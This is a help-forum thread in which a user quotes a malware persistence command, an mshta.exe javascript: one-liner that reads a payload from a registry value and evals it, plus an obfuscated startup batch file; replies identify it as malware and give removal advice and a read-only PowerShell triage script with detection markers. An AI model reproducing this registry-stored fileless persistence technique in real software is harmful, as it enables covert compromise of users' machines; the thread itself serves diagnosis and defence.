
There is a shortcut in the Startup folder with this as the command line it runs. I've deleted the shortcut and it just reappears within seconds. Rename it and a new one reappears within seconds.

C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\\software\\voxpbs\\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"

I also found a batch file in my users\me\local folder. The commands it runs are:

echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH

I see this being run when the computer boots. It's called by a shortcut named "d178". I see the command window for a short time during the boot process. I've scanned the file "505f.3f751"; it comes up with no infections so far.

If anyone has any ideas on what these are that would be cool. I haven't tried a boot into safe mode yet to see what happens then. I probably will soon.

kenorb
montejw360
  • It starts a program called `mshta.exe`. You are infected with adware/malware; you should remove it. Delete that key in the registry, `HKCU\software\voxpbs\semhdvkm`. – Ramhound Dec 17 '16 at 02:55
  • A nice tool you can use to remove automatically any registry entries and potential harmful files created by the malware is AdwCleaner ([download here](https://toolslib.net/downloads/viewdownload/1-adwcleaner/)). Download it, run it and after the scan, it will alert you about the results: choose the files to delete and finally delete them. – Jesús Hagiwara Dec 17 '16 at 03:30
  • Possible duplicate of [How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?](http://superuser.com/questions/100360/how-can-i-remove-malicious-spyware-malware-adware-viruses-trojans-or-rootkit) – DavidPostill Dec 17 '16 at 17:12
  • I removed the registry key HKCU\software\voxpbs. It was replicated after the computer was rebooted. It has several REG_SZ values under it; semhdvkm is just one of them. I can only see garbage when viewing the values in the main regedit window, but when opening any of them the value string is blank. Although it has spaces, i.e. you can backspace from the end to the beginning, but never see any text. – montejw360 Dec 18 '16 at 00:41
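The triage a defender would run on the machine described above, written here as an added example; it is not code from the question, the comments or the answer. It assumes the artifacts exactly as the poster named them (a shortcut in the Startup folder whose command line runs mshta.exe with a javascript: URL that RegRead()s its payload from the value semhdvkm under HKCU\Software\voxpbs and eval()s it, plus the dropped file %LOCALAPPDATA%\9d9b\505f.3f751); the function names are mine. It resolves each Startup shortcut's real target and arguments, dumps the registry values that regedit shows as blank (reporting length, leading whitespace and non-printable characters rather than trusting the edit box), lists running processes that reference the artifacts, and hashes the dropped file. Nothing is executed or modified.

```powershell
# Added triage script for the persistence described in this thread; not code from the
# original question or answer. Assumptions: the .lnk lives in a Startup folder, its
# command line runs mshta.exe with a javascript: URL that RegRead()s its payload from the
# value semhdvkm under HKCU\Software\voxpbs and eval()s it, and a dropped file sits at
# %LOCALAPPDATA%\9d9b\505f.3f751. Everything below only reads and reports.

$ErrorActionPreference = 'Continue'

# Strings that mark the pattern from the question: mshta running inline script that
# pulls its real payload out of the registry and evals it.
$markers = @('mshta', 'javascript:', 'ActiveXObject', 'RegRead', 'eval(')

function Get-StartupShortcutReport {
    $shell = New-Object -ComObject WScript.Shell
    $dirs = @([Environment]::GetFolderPath('Startup'),        # per-user Startup folder
              [Environment]::GetFolderPath('CommonStartup'))  # all-users Startup folder
    foreach ($dir in $dirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Filter *.lnk -File | ForEach-Object {
            $lnk  = $shell.CreateShortcut($_.FullName)   # resolves target and arguments
            $line = "$($lnk.TargetPath) $($lnk.Arguments)"
            $hits = @($markers | Where-Object { $line.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 })
            [pscustomobject]@{
                Shortcut   = $_.FullName
                Created    = $_.CreationTime
                Target     = $lnk.TargetPath
                Arguments  = $lnk.Arguments
                Markers    = ($hits -join ', ')
                Suspicious = ($hits.Count -gt 0)
            }
        }
    }
}

function Get-RegistryPayloadReport {
    param([string]$KeyPath = 'HKCU:\Software\voxpbs')   # key named in the question
    if (-not (Test-Path -LiteralPath $KeyPath)) { return }
    $key = Get-Item -LiteralPath $KeyPath
    foreach ($name in $key.GetValueNames()) {
        $raw = $key.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
        if ($raw -isnot [string]) { continue }
        # regedit shows these values as blank: report what is really stored instead of
        # trusting the edit box. Leading whitespace pushes the script text out of view.
        $leadingWs    = $raw.Length - $raw.TrimStart().Length
        $nonPrintable = [regex]::Matches($raw, '[^\x20-\x7E]').Count
        $preview      = ($raw.Trim() -replace '[^\x20-\x7E]', '.')
        if ($preview.Length -gt 80) { $preview = $preview.Substring(0, 80) + '...' }
        [pscustomobject]@{
            Value             = "$KeyPath\$name"
            Kind              = $key.GetValueKind($name)
            Length            = $raw.Length
            LeadingWhitespace = $leadingWs
            NonPrintableChars = $nonPrintable
            Preview           = $preview
        }
    }
}

function Get-RelatedProcessReport {
    # The answer suspects a running process re-creates the shortcut as soon as it is
    # deleted; list processes whose command line references any of the artifacts.
    Get-CimInstance Win32_Process |
        Where-Object { $_.CommandLine -match 'mshta|voxpbs|9d9b|505f\.3f751' } |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine
}

function Get-DroppedFileHash {
    param([string]$Path = (Join-Path $env:LOCALAPPDATA '9d9b\505f.3f751'))
    if (Test-Path -LiteralPath $Path) {
        Get-FileHash -LiteralPath $Path -Algorithm SHA256 | Select-Object Hash, Path
    }
}

'== Startup folder shortcuts =='
Get-StartupShortcutReport | Format-List
'== Registry-stored payload (raw, not executed) =='
Get-RegistryPayloadReport | Format-List
'== Processes referencing the artifacts =='
Get-RelatedProcessReport | Format-List
'== Dropped file SHA256 =='
Get-DroppedFileHash | Format-List
```

Run it from an elevated PowerShell prompt in the affected user's session, since the key is under HKCU and the Startup folder is per-user. The Preview column is what mshta would have evaluated, shown with non-printable characters replaced by dots; the parent process id from the process report is the lead to follow when looking for whatever keeps re-creating the shortcut and the key.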

1 Answer


This is most likely some kind of malware, adware, or other PUP.

Therefore, we should try to remove it. I see that you've tried to remove it with regedit. I suggest that you try AdwCleaner as was suggested and also Malwarebytes.

If you still can't seem to remove it, then this program is probably running itself and copying back when it detects it's deleted. Therefore, I suggest that we try removing it while external to the OS. Download any live Linux distro, such as this one, and a tool called Rufus. Use Rufus to put the ISO onto a flash drive. Boot the flash drive and try removing the file. Hopefully, when you restart, it'll be gone.

Aaron Franke